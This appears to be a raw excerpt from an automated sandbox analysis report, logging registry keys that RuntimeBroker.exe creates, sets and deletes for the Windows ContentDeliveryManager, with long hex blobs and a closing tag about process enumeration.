7400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000069bb92f11000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32336230623939636636383330373336323364616537393162643937326364333333306466373637373030383733313635356534613237386662333564656564000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000065786e636c7a6c6900000000000000008a5a5fc8644fa54689f1e6b55fcc32f56e32c25520feee11bbcf5245ef6e6cd88a5a5fc8644fa54689f1e6b55fcc32f56e32c25520feee11bbcf5245ef6e6cd8ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002b00000053002d0031002d0035002d00320031002d00310037003200300033003600360036002d00390033003700360039003800380036002d0032003500340035003100350033003600320030002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000e45bd842000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c28b2fe9-eb4a-43ac-909 = 7f43b1e9d39cda01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b8bd6278-bf50-4f8b-a6a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5af8ea4f-0697-4706-915 = 8b3349e9d39cda01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b8bd6278-bf50-4f8b-a6a RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1c8f63d3-41b7-4280-a7b RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1c8f63d3-41b7-4280-a7b = "8324" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\df3850ad-bbc9-411e-9f7 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\df3850ad-bbc9-411e-9f7 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000853e49e9d39cda01853e49e9d39cda01853e49e9d39cda01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000a25831a82000383262326136653338343564373838323031346139313633613638623336313531643232626566626662653461623332666337303339386235316132666266630000b20009000400efbea25831a8a25831a82e000000000000000000000000000000000000000000000000007bccc900380032006200320061003600650033003800340035006400370038003800320030003100340061003900310036003300610036003800620033003600310035003100640032003200620065006600620066006200650034006100620033003200660063003700300033003900380062003500310061003200660062006600630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000069bb92f11000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c38326232613665333834356437383832303134613931363361363862333631353164323262656662666265346162333266633730333938623531613266626663000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000065786e636c7a6c6900000000000000008a5a5fc8644fa54689f1e6b55fcc32f56f32c25520feee11bbcf5245ef6e6cd88a5a5fc8644fa54689f1e6b55fcc32f56f32c25520feee11bbcf5245ef6e6cd8ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002b00000053002d0031002d0035002d00320031002d00310037003200300033003600360036002d00390033003700360039003800380036002d0032003500340035003100350033003600320030002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000e45bd842000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1fb5f06d-3ca3-4393-8aa RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d63b6e2-41e6-4d37-816 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c28b2fe9-eb4a-43ac-909 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cc9ee2a2-d981-431d-949 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\44b1ef29-803c-4918-95a = "\\\\?\\Volume{42D85BE4-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\25b2fcee4b577958f2189d2620b00bf863fcac8f67927d11a92adafbe4ec1887" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\df3850ad-bbc9-411e-9f7 = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\65105ed8-d001-4cd3-adf = f0dfb7e9d39cda01 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5af8ea4f-0697-4706-915 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5af8ea4f-0697-4706-915 = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\df3850ad-bbc9-411e-9f7 = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\65105ed8-d001-4cd3-adf RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\65105ed8-d001-4cd3-adf = "8324" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\df3850ad-bbc9-411e-9f7 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b8bd6278-bf50-4f8b-a6a = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000001d2a43add39cda019f146eadd39cda019f146eadd39cda01130500000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000a2587aa72000343366353930613465316333393235653763613466333238626230613936653533633332363363376239373062666635353661313236343935346536376436340000b20009000400efbea2587aa7a2587aa72e000000000000000000000000000000000000000000000000004cbd7800340033006600350039003000610034006500310063003300390032003500650037006300610034006600330032003800620062003000610039003600650035003300630033003200360033006300370062003900370030006200660066003500350036006100310032003600340039003500340065003600370064003600340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000069bb92f11000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34336635393061346531633339323565376361346633323862623061393665353363333236336337623937306266663535366131323634393534653637643634000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000065786e636c7a6c6900000000000000008a5a5fc8644fa54689f1e6b55fcc32f55732c25520feee11bbcf5245ef6e6cd88a5a5fc8644fa54689f1e6b55fcc32f55732c25520feee11bbcf5245ef6e6cd8ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002b00000053002d0031002d0035002d00320031002d00310037003200300033003600360036002d00390033003700360039003800380036002d0032003500340035003100350033003600320030002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000e45bd842000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c28b2fe9-eb4a-43ac-909 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\65105ed8-d001-4cd3-adf = "0" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1dff26e8-1f38-4e76-8e4 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1c8f63d3-41b7-4280-a7b = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b8bd6278-bf50-4f8b-a6a = "8324" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\44b1ef29-803c-4918-95a RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1c8f63d3-41b7-4280-a7b RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\df3850ad-bbc9-411e-9f7 = "\\\\?\\Volume{42D85BE4-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\82b2a6e3845d7882014a9163a68b36151d22befbfbe4ab32fc70398b51a2fbfc" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\65105ed8-d001-4cd3-adf = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000962774e9d39cda01bbaf9ce9d39cda01bbaf9ce9d39cda01190506000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000a25831a82000383262326136653338343564373838323031346139313633613638623336313531643232626566626662653461623332666337303339386235316132666266630000b20009000400efbea25831a8a25831a82e000000000000000000000000000000000000000000000000007bccc900380032006200320061003600650033003800340035006400370038003800320030003100340061003900310036003300610036003800620033003600310035003100640032003200620065006600620066006200650034006100620033003200660063003700300033003900380062003500310061003200660062006600630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000069bb92f11000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c38326232613665333834356437383832303134613931363361363862333631353164323262656662666265346162333266633730333938623531613266626663000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000065786e636c7a6c6900000000000000008a5a5fc8644fa54689f1e6b55fcc32f57232c25520feee11bbcf5245ef6e6cd88a5a5fc8644fa54689f1e6b55fcc32f57232c25520feee11bbcf5245ef6e6cd8ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002b00000053002d0031002d0035002d00320031002d00310037003200300033003600360036002d00390033003700360039003800380036002d0032003500340035003100350033003600320030002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000e45bd842000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a6971de-4a54-4436-a18 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d63b6e2-41e6-4d37-816 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\44b1ef29-803c-4918-95a = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000094dc21d5d39cda0194dc21d5d39cda0194dc21d5d39cda01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000a25820a82000323562326663656534623537373935386632313839643236323062303062663836336663616338663637393237643131613932616461666265346563313838370000b20009000400efbea25820a8a25820a82e000000000000000000000000000000000000000000000000006c31ad00320035006200320066006300650065003400620035003700370039003500380066003200310038003900640032003600320030006200300030006200660038003600330066006300610063003800660036003700390032003700640031003100610039003200610064006100660062006500340065006300310038003800370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000069bb92f11000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32356232666365653462353737393538663231383964323632306230306266383633666361633866363739323764313161393261646166626534656331383837000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000065786e636c7a6c6900000000000000008a5a5fc8644fa54689f1e6b55fcc32f56332c25520feee11bbcf5245ef6e6cd88a5a5fc8644fa54689f1e6b55fcc32f56332c25520feee11bbcf5245ef6e6cd8ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002b00000053002d0031002d0035002d00320031002d00310037003200300033003600360036002d00390033003700360039003800380036002d0032003500340035003100350033003600320030002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000e45bd842000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1c8f63d3-41b7-4280-a7b = fc1cb7d5d39cda01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5af8ea4f-0697-4706-915 = "\\\\?\\Volume{42D85BE4-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\23b0b99cf683073623dae791bd972cd3330df7677008731655e4a278fb35deed" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\65105ed8-d001-4cd3-adf RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d63b6e2-41e6-4d37-816 = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b8bd6278-bf50-4f8b-a6a = 038684add39cda01 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\65105ed8-d001-4cd3-adf = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
